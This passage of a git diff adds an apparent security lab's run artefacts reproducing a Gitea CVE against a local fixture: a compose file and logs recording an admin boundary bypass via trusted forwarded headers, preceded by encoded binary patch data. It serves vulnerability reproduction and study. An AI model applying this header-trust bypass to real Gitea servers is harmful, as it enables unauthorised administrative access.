zPa7D;D1^)oic*i618E~fy|s}v0vDA2qXn##F7eLQS`0`ow=xA$wjDRisDhD{(cTrD
zG2q{~7??-<T)Zr|`OU59F8B$oer3JCvAvbv*?-@9tgApzQ1aWS`xaZJTf{kK2sDdl
zuouCJcDYrC!gpvg)GoDR7O@>G{n62}JeRA<C>t5U2Uwx#0%EqPi2YA7oW}<T<KQK^
ziVx<2cwX~5`-DqZ3Bk^KKkY0(KkuzIZ5e7innksLY|OG_mOR4~RcyMp`SLi(0Pq;O
zY6W+uyieY-bnBF^4dwc_s}P@@o-$rUps#f|-WcwR+ctUbaOd&qJ=|xrWDOZXI+1_$
z4_HUtB9m6vP_Cb13Z6HrOGixPy4I6&eZjS~@Yp`Uk%I{L`<!e9%)4L|SNm%G&=dDq
z`(X|-m+}L!rECd$tUd$qp3CYlj@_xd64&-t_@$2k3)~7_=t_ygYfDR`|I_Z_xH+A^
zGHes7`R!tF^pKtY;#WT@;2q^ygQ1S4d#ouM>=fC2z}7%M`)KUxvY{$wGg{;PxL%)=
zle3@wr6%*8NL^z=ev5u!o5<7N5Ur}H>Wb&~-0Yvz6FiNmH}qLDT8*{GU`#yMhjObU
zCFv!CA9x)YI&Wpj$1&k?Cnkbr<QA7cRXZzmkx)IfT<uA$j(VM77D6uaG$5=03=qH8
zsMBNUWB#e61C(@V;`3cSxH?dqDC#)8uwwq*!}F*sss4pN6g$azP5+|h4~~jL<|Ufg
zw3qrkExGT<*c4XmTUBZSmbf#p4rwEE*)B*4MsDaHbVhRo5-@hWImP8M?J%*hum@1P
zzV}hB?|z+mNI|8;0(5P!HNKale3-+AI3HZ%r51E5E-s__S?CHZmApLm+L{{hL;|C2
z7R<5=Nqp^H<0l<+Y@M2U%ai#fvp*7rTq>)oDi~cOif)h#kN5PHSyvBVc&W?neUulP
zA$6I@a`u~vjg08w!TNY5BJcQ;1^KG9Ton6cl|rZELeKfJZA`W*bBA`F+m!L~O>mlJ
z|N3Thy3lLzNbu3GUt_xU_9a>+8q3{NX{tcwHI=0icDqIQw7K`?1KtFImpNT;yUxI_
z=8sS742&QP+Es!_j`LO!GSgNHsH>S2;>t`mz2bgDXFbwpLLbtQ$8DHfGMlZVuEOLu
ze<4~v_K}1>0Tc`qLjknMXRT8elK9Pe1w(zx><#5qd3VLd#f42XKg?FI%1x`I^1u5^
ze*gUKzmZI4v-CjZ`7wq$=$}w7D)xF|Xk`Qxw;$JcQ*WqRhRenVQa#koP%l>9nzf1J
zF{^;S`hX!sdaX$y2dWI8W)R)CnTz}9h|T}@;pNW}s|&}6U9%qvTV)4VQMSJUIpN{7
zF`nufvjSksT2G~n<zJgKI^{O|n}-ja+FolTbAl-OSt1FU<b>=~p22z?nI$C(?Oxeq
zdLiz=!v#=tZLvs}F#mm8(N}uDCPs>1guS;I_RSP1Z&He~s&^3a+l*uQ$y?waT;sN0
zPSdS)SR1QFb@cPVJ`4#)p?dCQg*{=Ch%YDcyjeE|hgQvCXQz(d7)SiWo=BFa;yJdt
z-*27rUwo~}%#67-7M40*?R3^U-Z%}ub(N0EVpG&R8P&Vb{<@Etk1V&HTu0TTyT()W
zYXxDj0}1;JD`Sr|kEHuXZ|6ESU=xGQA@CU*{FS&u{gsaMq#POy{t*$zZ6_B|<%k&y
zJEM~-XUcS%FZYcaD;-IN0lS9wMRkU~2l5gGsT}tbCLr|+Ivl*(B=|A=`Y%CAt)Ajq
z4j{Hd6Ya&LeIObYQM~rk!v+&_#}^Tuly_H6J0r#Apv$>4j2`v<f;c8Aj|Cbr+3pI8
z*Y?Xe&h@Css-!VV3RaCApRMKwFKB_pf|n1t^cxmYOFOo+=QJ{#cWBaOW0I{9+;7n=
zI#oWk+A#Ydl!)7SHuiB-40c{(zTS`}^7N$cnjtKBR}_817GZM`C37<N_%!f<w(P-c
z&4VX8>7TGj(J_+Qb8vJ>vCn0ZDHjt=-k-VBkIWoaVRchZm5jQgUG#RU)TsV-mR6cH
zUAtL$z#Q3=q)CyyeCxChW_4A@!FWE4drff<EaC~6!V?2X*&G0(-yV?(->Q@`VBc04
zNm!?*etxC5Mc1)um;RaX+=q13yf+TAHP3yTw&N3=>x`VTfQD1DR4ZhaQwf-LwLyoi
zNezG6+)ihd|03+JZ6+0ej8FEN$=WgwOREi4W?k=#@f6cDE0R?k&CG{gKt-vAn|H;c
zV0Q-lvzE5DfPjSUNL}iO4^lm!1t<m!t%b=|bfZ!V#>R7;g;)mJ{3*SIxI)DWFZ~Xc
zJlgA~gy9fr={sCT>UiIIytLT&*C&!5dKP%)saKno<;5{#X=dwA!FQgojf{wfO$=RQ
zA0#L!APt0*iBgLu(7D^HhHXBa9d#!d#ykeIC`nfmN5bg1`}Jb;-eUWi4Dg{rM=^{B
zK)_K9>?@J`du!U{<$=qF_fSVTmn2vkWTrbJxxK;8k)Fl)-k9+>NkePMTFBh;-MLn<
zZ<BHvNq-aw#LllAU9jGoO!OqUINkb*8Le*6^Z_qk$aQRA|1l+({`m8~rKLI3Se(|Z
zWhot<YFppdUap_p0CTXOI~|QMcU_;17=cSAeTPHcz(T<IAQX@n__W+rHnsjLw>0Xc
z+NXcmpz8?d7buBYbfqT~_z+0b6&IO$9&*LLRJJJ?QlOyHZZ%dKcEc;bPhjn<!2xT&
z)5(005uz_TKO`i?eveRP0>eDoQ(jJqCP~6y@IIQIvCYanlDn!|ZR|4Fp-vzr<Z_a!
zn&}HK<T>A^WkJrO(wt@B7)YT`nE|pV9_^&grE$g4W@(PIYJ8XGLVUJYr(oL7CVYu7
z-{<~)bJ<^Jck^)e_%KWM{H(Ubto!a^y^mjuPMM8r9f{LbVUL}IUqyuKIck=ZHQB~y
zeD>2s&@POHehPP4zE;WlZZ3biEU`hYr3H$QBkh-v$KW?SN{tSE7><)vcmm|NIv_Sa
z8wRRuj&+7o0t<^VQ1Rf-?*VV^qy4ac6;z4u`I(<ifXPFIMi9_De80Q*iFi79Cy6QT
zt!ib;lP3W<Qk`wYXGA2_ygRnWrMnn*T>p#(XcLg-TtnCQ{-nE@ezNl0u+X`<s3;6O
zG0xZw4tsdo_dSo-YvJdUTo+6fDYKbKv7foDBC@x)7rahny%z7hKEnh?96|e(cQ95&
z1>5GXHw05~_AYeBXy$a!&wmv;zw3Qex_5K$I*I?>l2i`3ZrVM&DTb(0#$q^C9Y*^P
zr#!jRWg;@=en;k<0W_#I8jbv;PVluehD{Zy34keYuX5X4tz@^%{w(*s<a+Y1`$A8x
zu7D$G%^C`8+7D+#JHk?1)4cmlWSHdb(8!mXiB))njPmzi9x+&(1|{7Wun2FyI^9Ys
zX!UN)tTWo0m{o(<XZL!=QjABS>0s8^I3Ck1gF;1sse)nD#5iq%OE+MNs;QeJE-#y1
zi?{O$mGh>oRoVS>VK~(AetKQ%wb!KuTnKQ~Max8SbdPn&;`J(1ucB+b;frWUlL?n@
z811qnFE$c<s*P>j_Vc#NgM#OEs~u5@8gDO5fc1i2d-}k%Va;4czs(s*8BT@J<btvO
zrY3RL&kH>U&&3M#OA5?;Il%#CGghN+z5RPC6&MPUY?>aQj~8xj!K4EH+N135>m-~u
zV`)Y}b4hz9VA9q`Q+u?#+~?f2IAu8k9h5<20vZWeXr-jy+q<V5CVk0YYTZ~GR=ZaW
zIb{F~ihmRu%LL$uJgt1Yuh@Xj{Id&+zHj#z5mfRU?;#q?kph-Ne%r}tHUlkDPVJgf
z>9D8QNxPJ>ZEzpj22brwtc!T;ub>digCAwTzfTO0hZ~5an@uyXKqY;;gZNYWD)SPj
z&j}pULu|p~ot%A5Fq<Gc4Xa|c{#fmOLoD~q_FS)Op+1NE;o%{*m_4iPETDjz`#r97
zH$IqOSs}gen&cV1RY&#XFIurL@8t87HuMf;ACJ~cd@>_AOdA%l3!S>s27uC`_~jP7
z+&S;f@VVv07QvH&cJI|T&cySm7-Q*!%nvuI!@#Uv=Y1nHwe=&ZW^j$Pyh7-mH?vbf
zy^!q$NQUdHk)!p~V{p|dKP71rkj#zlHtk5K5%!9u!$()xs}5U8)2rXW|4U!9Qsq#F
zaAHnJ#XOpBXL%HWmz3G6nJU;cdz9S9mjq_%xJI!q<5S1odC~}zQrcIVT0<Nv(w=|C
zhCKKSkF(^tPpu}q0mH>guQ^!<e*U;QpwYZ5y+kD5a1yl>cmK&-i-EWG{BGY82%)U~
z<-duf1sEA+kR!XspxQ%WE8m_OY#eeVy{H;f9hjVg?ak(#6RAv1RWMPpx!Ct|ph+p5
zp(t_$d?5(0JqtH^muGAUHbN1rv2XLUO9SBl)~I8&9L)0ZsS6JX(rIyW3BJWWJyGq-
zaE{<eA77YWCRo(fcquw5x&c5l8+z04092qBaLAMBbb-+_x0_h>$1Bh^Ax>n{4cl!~
zwSdFrRC%Bl(u-I1hcVA)vb0RHy9zx{6DSc##;w6Vf-1N9kZ~5rYaV>z)RW(8@MOL_
zL3Z(xprFsep9Z$y;|I3EgY7I;R9CK;GHR5O1DP<Hmr~5<<amFB+?JQAEizB9#B03<
z=gpU%^s7|@pg%q)U{Z2CoyNhbdV)hHChM>SrZB&?onA5juK9IQ?pMtDvL_15INxR6
zws*E}@?k;Ik{vjMD$OOurMlH-;;$|fuMPyht)&lh4P_JXQ&dmpQ_-mPIn4l~eh0qi
z(N0`VWKuFvJ^A>C<;3+;Z&v+5m2wkVc<wA7t*=$X9q7*^DJxj(u{*}^38{o#SmXQf
zO2()LCfUgQI~NX2?MU@LJm?3^8rxTre!_2q5jb@$Mvd<{v>(_zJ4emXzv=nJN8<Fi
zo+JQxf@sK|%sOJvrT`p9Bdm5NEZT@-esx*Y`AB|QEgLddq}iJPPv&&HsWsEstj8QM
zEkzxvZ9UhkQD~zeCRPt{*bl|$$=A`1U8{rHyt0pfpu}_wmH2LqkJ~A)53%_VT3T$L
z+s$0O-sIdeA3`e<t(lDaX7ToKQOzkBMvl#yf5xUJ(9uDaTBxD{&N?-+AaO3hKst(&
zQf?Hmejip}KQ-LyyCjhS*rRPAy8vJD>v_lD!q~|W=Ax}904EV1vEd0jIPIi@sZ`Gl
z>wJ8;3~I~DqGi*N@6)G(Ydg4Lj@rU;`v|HPg*xWq9B$eiM*K$$NECF}K2-E=Y&<{T
zJ}-i=8S6y&lHp=vIUQ#xi4Q)BD1=WR#{Z)>BzVRDFHWZh7=RV^54lVA@DQfyZOyi?
zfjD%i;IsVsY_C%Mzwlo0q`z$eOZezlx$AM<fYkDEzC~5}KVUA|LmH%|x{&?J<AgGf
z`V}3RT|*1%4mg=RYzh1Y@M<sBd#?LbU%EP-uT{IVligH26veJ3e>ex&6pDu)S)jbW
zuEztTFDuBQ$|=vH{VmnmSf;wUwI2XX<X4d~%XeRx$%H{@Mdc0$Q$5@Rgcex0v2F=s
z7@k9UGUC3z=S@<<roGXO(Yc*|A3`Gk%!s-)=0qU?*;9yhE|b8y2683F_y+&&^#<k^
zY#tk9)jKMMErW*F?6VgTE#mA)K!LMCm7T$RlnPm;6kV0mg^Pc*+|@G^ric~b;;&ov
z)qE6J^W3c&21Xf-ujudUlBaHL#3=#ya4H#VSJa#i0E%JCPU?=!$*;4%RR8Q+oX-A!
z<Ke(|o>En2{CtCYmBz|p765WAKTaE%56T7Nt13z}TSZy&Ht@LedtriE-ixBegqQdh
zig=&eTC~l~dkgZ-6=}n4LC<TNY|z)a!ULcg_Gm7eN8eOMDUw#Hf#vaE?5Q2c5g_@H
zOGkH+BPRn$SQxBL>W1_6CSl+NY~Gzj9g8j-<HlZ5#R)oaX3L}%ER|#0f{0k_={h3l
z{0eQh679T2Y$4_z?g?D#3>2<<u?csa_tN&CuM@C0^458jDXh%%%<%L>goR-^ybfv7
zmY#8AK%=Ux4hh{`9yIGQiOmM`ciU=3RWo1-A}+5Xfs32`NiBW|$@EF0jN78baUp|B
zpxCrKUhDEb`Y4IMEM;$NV;-{(43Ek=_gASsysAv8BBY2D^}ZjxB>W+2aA5LKUuK9s
z()sa2-QC@!9Qq!hlK_L4=w7Ji3K5VK+SP)UQ*FjdO;7z5;OyQLCXz6QnSlq&<o|<J
z#E@b&{*ARtbqCJuZf+j)?TNYG)x-VfYPh&d13!M;D)^k3m{zG-XahS6*y^{pw`2N{
zR(%X<77>Fnk7TB!*oIdps>NK`N7QqpLD9RjcAdCG%;qEuqGG;Ixe;nFQIY#I2}f*x
z26aqq4^O~9$R;uu=O7D@Ri=40`8Z*HvxWa4sQxI&4`v@-ZkBVVdtlLjN5AILNFf@;
zhiD|yd5D!5$u(SPAeFKO`;oYqt5Den-;ELr@qB<fugE6A-Y6&}1cPkoU~(R+Z0!Xo
zq<WWx_U-A1ve<8XAMMD5Pl2k>hCzI?MRKL;>#!LW+f2lVZ$k><4C)wM`B|HyX?sti
z*mOLA5vIWx4MIw-)20K=Co=1bB@*#)TEdhc;N`qe4wR$2mUzugvH7g^=@V4H_q+5Y
ziP`p0je^$dv%g-8;k~woL@R<c^baB{2}H)iv(}atCYRM0Pe_;6gj@%aOsZ@pF4N62
zT2kvTrP`hZg?ypGy-CHx&ySeMiKA#6NS70OIoA9tIJh-92{YxSE0&v-D?T^FL#8iL
z&?VI0v{REBm>1Tl=)IfDm?ZV&{UaO-v1i7yX}4vb^w(H)MlTQL5V6PFwgyjZ6>0Wz
zhQ9!D)phab?ZZdDXDRAzq?Eq<ryua=*wmu@y$-hmsd;s`bjnr_g+)ZtpU8&2zeY;-
za7<*83=ZC^Kuof*v;SD>J`fM%LW7g;GybwDDJ^B!ugMFPh^HJZq_0eWnYjmE@YT`U
z+~&-FQ&v$RD+|gTx^6ZK_+8%3eNj}k#nBKv(fnEVEkHm217|AZCgLqI;h`~`V?{EY
z$~OHM?kHVx$v`xkQ(ZTDEk&ZU4zUi$_;^u0?Il)p6eEZQ1VC+4WGpPRI4-;-W&xzi
zmW-fWK%oG^DxEco?bq0^wm?`h9YGm#7j)fP_#1w!U!Q?VYB5lyfGhBw4o@YxCx$;{
z=a$MbxV&-WdwkC<*yO5Th4EN23-r_3m%8LHZ_jhF>SPS&#uR=cV&M>x&U9JR9xBv4
zM*EI|7^Qt`liI=o^cH$N7?CI!!>5oDxP*I?f{8X=m{LGC(*K-8C3`;ym*p*If0^}-
z)6c^8vctg-ZqN*tgLtcyB*Lbg^4aKW42wXrK_Sc_l$oZ!pIpwKbd5MS*C0|@*nDpg
zzybWWePzxG^Tqc+5pkaO&7?Y6j;3UrSp6Lb=vcpB5y}phy(w(JRZ3w9!eBaC;|o1x
zu8spgEiLUs!fWlsZ~FWGC#mOF+E3;sO;On{x6Q3|kC*w$^F2CQe3;`dh}(P0PxF4X
zV-0!Ti_X9Q%t_|C3WL*Mmgm2x=;3)-<T~s?F35fN^xI2*?o7ybx;`^%f~q|+9xgkM
zDOqgC^wLWN-s3`kIL4>R`6yRWtrY2s^kM7d^N$z+)G7=+d@AO;RcEqvO{QKwhs;J=
zqgv7VsxzF3lszLpLeF%l_704n8*E%UIsC+H+JiJ~m=28NQOkQ?X3{=gd<_z{2t^p@
z5Vb#AlHsy4rhIJz1kT>@hvi**(rXtL(z-J8q_oDgGXX7ola||K<Lsh}Sd0a##5SpF
zlgyvb{7cP3SDfDIy@<>VgCh5B7k8z|M@0nJT0W^EoknGmMguMRTXp99qPsKE-Ton*
zoc<-P=>cbeibEjSv{bjYc6M%MtE2}~F&1}$l#GEfk#Ol}z<u|7;~5T_(MV3zQ~=sU
zCOl93P{3FwRwj<8l8A<pLt1%rGa|F))S%8wqBdOB`TXqSnoeC^9aQl?DouXT2M}FD
z@D9{%w736Z`()w`htao|&b!*8WpthF?Ch?$IcF+<;alGZ4FHb5kyd$La_}{XWDezM
zM6+fwusJIZb^3GUiJtH5ZHOg%%k>w(D+epStVpE=q4*6NF`wcs5l80k?Rkz@L&X-z
z9AXR_rND~iYHjD)Ctn_~89JEG!Yls$_633U`zF%9ETXvs8H#D~1puDm+<2Iyo~?}x
zuVJ_wOtV&Jxmy)Fh8y3;AcGe+<Yv+NozYfKyr}X0toLzQqIM>1L~YX4)YL;EDw#uq
z0G!w1*0rO_sn>*MhL)NI;gjWEguCzA^!uYe6iO-x-A6@j8V$8kb}ixFgHL>XJ|77g
zBmEs0dJ!CRi-9hSkWXUylEQ^v?d85L?cIMI;hNTVduRm3Z_6nC;MH@Tt6BVlf`VlG
zwqBGu29JX{S>tkG_^Q{zpC<|vP=e!G=T-dth~OOqZjSxEM&CItBXcJaJ8AhYi=0T7
zDyPF%RIBHo-?!bjNo8V0Q9zCkJl;82G&)gk{QA{Lr_%Tg+ufkn%loWRV$O43@#+<4
zh{lmQRsfU)ya_&yU|!UVmyd+V@f&^&NhGd--b~D;F$?1&RobFFkn(Bv2a$OR%m!i8
zj2+$aBE2mw05qb3T%5OW^4ARDXGHW*3UgLeOcWDY=Tcik(gm!?xcHmH$@#k^LV33K
zua!!R&p;Jy>kLLv$wnb4>N}zekM932n1=*&#6u&d?C-?!7I@UvD(s%X8O(WwpM+Ca
z){~f3Mdhx2<(6sM2ly6cSsqCS_I{PiiC?bFs1F3?N!zjD^C)9Ez*rX!w-*R*!>oaD
zn)FMogxQkGQWxIjzY2S6$=n{Qc%dA@)7|_znq6JKMaZIm5W`Y@uPSKT89&;b9L=u9
zWM2j038qo%*1AmW_aq*{h_~#3slc79TcQn%*cNeZ%^wLY2+4UfwxOP%Rw@0MyUe0Q
z1GKi7_k@t^Sr??2!RR?j#@~@k+%H@9S8OW=)TiDaid)jYx(ma2*-_&C3<frty2U0%
z`n6S2h0is@E4{i%?R;(3fiYvkS)gB?apC|)yMQW1#lDS+YTvanXLk{wEtARdCGpGq
zF;M`d&18_NqvCE)6pGobZKap`$lj-i>GMECcgcOrU*GNW3q4r#B&P>P9TylyfnMa+
z^=q@=tl_N|FmR&-(8Z?L<%NqE%|mPWotNK1!5Fivw*9=&FIijN|Nlbf(PffX`Rt^^
z6~+PJ86pX&5!?sz%qxItDwgAp<LABVYb+?>gtw(v?~`6zn@xE|PFL9J;IA};k0t||
z-70my>&;M&Nb_L7=)QMy7{z8V*WRu=p01d{si*CHccGhKcxq|3U3E*pMDpQ>tiANk
zNZm50I=)kY>3*c)82e`A*PkJyS1SE=_(DjfpzoQn^qQaI0>rYp$L*0UGwEdd_4;cz
z6N2q|po#6np>Rt!{Lv;5t0A641-L+IgQnl&`*)*`4G`t5;#L4x(MAPRh8>osE1}3F
z{vjw_5sEr7=_1x+&*FL@dALE|uX!9j)gb3tW{s|T^3Uov;xsmnwP-hfPyG-wNcb$M
zJC@rOXn;UkaXrY~uGoywL0Snq2hh>_>>O0sq8r959bb7L9r{+*M!3YU^B?+bT{lfq
z>17WU+vsQ9PS*->!$4a$f*uTe8>jsh#;Tcp-|>in@s49K0C3i{#r?xZwJKi81TCwZ
z9z~toJeV`w=}ItctwW4VhR*LaZ$`9+B(=qIH$kd!(f{1;N5?}rsO%ok9=pG;t9#?m
z=RLLx^KkWQ+(viaXV7&gTB6FR)pIm-D~*FTH4D%cOB)OPp7RUwf0iGvWGE!C;1Qgq
z6X;+BvG)E)KGSNEZDB84xyNY{lQj~D+w&|h?i6YeqwCLqwkYT@uw6!pE;_-WUVd4k
zW8KPPa~;FBZ58x7+V>lgHgS{Vmw3elzORrPY^lWPfa-}%h=}{ea00NGdM>@wlX`9c
zC#2bB!(ON2<8Ed>@oW}lD(PE}3lzaiZ4R*_o^@2Rq4PEq$IpT&9s-JFnYgi7y{6cW
zK3ktUMm{s7Fy!w@@#eo_UqTsx7d=qtxxIcAMA@-%hf(XJ2q~BDwLyU7>RNt<{b?a^
z9g!YD#prPKz@k96dT(|`M<>qASaHtn&5<3wEf-~_4Ko%Nez?rDCu$qEH!~Gb(J&h*
ztO<8{AWi<d#d<VnTnwaZyG1IN38_+h6Sbb@Ds%A=_9w!bfd*I+xe`?WA7%^leVjz(
zxPYUZhr522!>-<UtpPZFrE|W4Ivl{{C8n$FnOO=jl1odz&YShVU7Z)&+8IhQdl5++
zl_d)o6*2)G596w5zc&MNCkWM<_udR9t-cmhZJf0zFsMm>%nyU%w^lCRuNyf#6@tDf
zP`(S_MZsjwe4XJ$0nY-(L`iKq4lE3V;Q;@_3)_mzWCwn5w{yV}uLU3Xn%_<8v9{w#
z7G6xkjU}0dwQ`;Kx7cSQTS)j_r%ry*y7ya!Gkm08UAvgr^_f#|jFd}1ixdrO|5ySC
zp6)8iA6%#eEV=5rQRTr%DO~I9$zDwJ-A~^C|0I$w;>Gq%B~cO*s$I;xBpT&Do1IC0
ztOTEZdTz<W8j*{6xXRobu`oB6{a=qyS-eDK{`2@t#LC>%*Z=%`BWrOi4AT7uv7r+7
zx1L+CcYmNdJL9im+Vl*wuu$#mMc5*ASSz2Pv#heRGA=F-J}uT_Y+Plfv0014w;g}1
zJRw{C+R~8uG|cl0&i`KA*&C9>!Qk%`HDRJ>pp~t4Q*AQDjAYf}GMC$TC46>I-eV`i
zllG-nyC%MD#Sp@=^uiOTKJ2fv{G`2(lKzaBE9B$jV-`Tb?LZU~vVrNwd#ptDvck*j
zykVvZ7w1SE=S8M|y_bbGDV<7W7Dg*crVOK|%D1*c*UT;(B&J~J8Ej0}d?ew`I5`s$
zeU6K1M?4qHK9$8=oSLY<wiAGrhX{X@Z)NrQ<&WKygUONo2+Sut5i2f3ItC>j%v8hS
zUsyT$<t4+~?X5p<=j+y8zw9|U^3$}GPcZN2_xby{O83E6+^f{7Vl|GfGc!^+M`mUl
zpPybJVzew>+zSo{V21t|n#nIT`oOtT)WS4M`jTG1E|<MO_G?TVB^m1aqib~y%H;Zg
zn(4`akxnef#&*bS<TgrvW+|=p0+Sw{(LmWjnxnO|scE2T0M)r25fXxZ(yDSHu#NVL
zySLjuW_~x;>vOJ4hVUEfH7BM|6n?6J^N;zxi2c8fmHGD>FbkG^{oi%?cOCw{asCY;
z|BFD1!I>rF{u?O%4HW+dihl#e{~}Pp4f1bFhKZA}&x;IjF&Q@2+mn3UN_K3+Czxe>
zaSQ$qi{ujI#;<WMK*sv-!~Z*L@*WoL{G6WkEE)cA8FM<nh-DsXu^aiSLkk|kl95n+
KR`AsD?f(E#Hy=9y

literal 0
HcmV?d00001

diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml
new file mode 100644
index 00000000..b37a1fe2
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml
@@ -0,0 +1,26 @@
+services:
+  app:
+    image: python:3.12-alpine
+    networks:
+    - labnet
+    ports:
+    - 18101:3000
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/proxy-boundary/scenario.json
+      PORT: '3000'
+    command:
+    - python
+    - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    working_dir: /workspace
+    volumes:
+    - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+      - CMD-SHELL
+      - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+networks:
+  labnet:
+    driver: bridge
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json
new file mode 100644
index 00000000..5899abc0
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json
@@ -0,0 +1,68 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json"
+    }
+  ],
+  "success": true,
+  "detail": "trusted forwarded headers crossed the boundary",
+  "before": {
+    "status_code": 403,
+    "ok": false,
+    "body": {
+      "ok": false,
+      "detail": "admin boundary still enforced"
+    }
+  },
+  "attack": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "trusted forwarded headers crossed the boundary",
+      "case_id": "gitea--CVE-2020-13246"
+    }
+  },
+  "after": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "trusted forwarded headers crossed the boundary",
+      "case_id": "gitea--CVE-2020-13246"
+    }
+  },
+  "proof": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "success": true,
+      "detail": "trusted forwarded headers crossed the boundary",
+      "case_id": "gitea--CVE-2020-13246",
+      "sink_hits": 0,
+      "uploads": [],
+      "events": [
+        {
+          "event": "seed",
+          "detail": "gitea--CVE-2020-13246"
+        },
+        {
+          "event": "attack",
+          "detail": "trusted forwarded headers crossed the boundary"
+        }
+      ]
+    }
+  },
+  "assertions": [
+    {
+      "name": "proof-success",
+      "kind": "runner-proof",
+      "passed": true,
+      "detail": "trusted forwarded headers crossed the boundary"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-browser.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-browser.json
new file mode 100644
index 00000000..c9e3305b
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-browser.json
@@ -0,0 +1,14 @@
+{
+  "required": true,
+  "present": true,
+  "page_title": "Gitea Proxy Boundary Fixture",
+  "page_url": "http://127.0.0.1:18101/",
+  "error_kind": null,
+  "refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json"
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json
new file mode 100644
index 00000000..fe51488c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json
@@ -0,0 +1 @@
+[]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json
new file mode 100644
index 00000000..e2a9239d
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json
@@ -0,0 +1,6 @@
+[
+  {
+    "method": "GET",
+    "url": "http://127.0.0.1:18101/"
+  }
+]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json
new file mode 100644
index 00000000..fe6e7072
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json
@@ -0,0 +1,5 @@
+{
+  "url": "http://127.0.0.1:18101/",
+  "title": "Gitea Proxy Boundary Fixture",
+  "body_excerpt": "\n  \n    Gitea Proxy Boundary Fixture\n    Forwarded header trust boundary and admin gate fixture.\n    Baseline ready\n    System: gitea / Family: proxy-boundary\n    \n    \n    \n    \n    \n  \n\n"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json
new file mode 100644
index 00000000..adb717b2
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json
@@ -0,0 +1,24 @@
+{
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18101/",
+      "status_code": 200,
+      "headers": {
+        "Server": "BaseHTTP/0.6 Python/3.12.13",
+        "Date": "Wed, 18 Mar 2026 01:28:10 GMT",
+        "Content-Type": "text/html; charset=utf-8",
+        "Content-Length": "1010"
+      },
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea Proxy Boundary Fixture</title>\n  <style>\n    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }\n    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radi"
+    }
+  ],
+  "steps": [
+    {
+      "kind": "http-get",
+      "status": "completed",
+      "path": "/",
+      "status_code": 200,
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea Proxy Boundary Fixture</title>\n  <style>\n    b"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/docker/app.log b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/docker/app.log
new file mode 100644
index 00000000..e69de29b
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/doctor.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/doctor.json
new file mode 100644
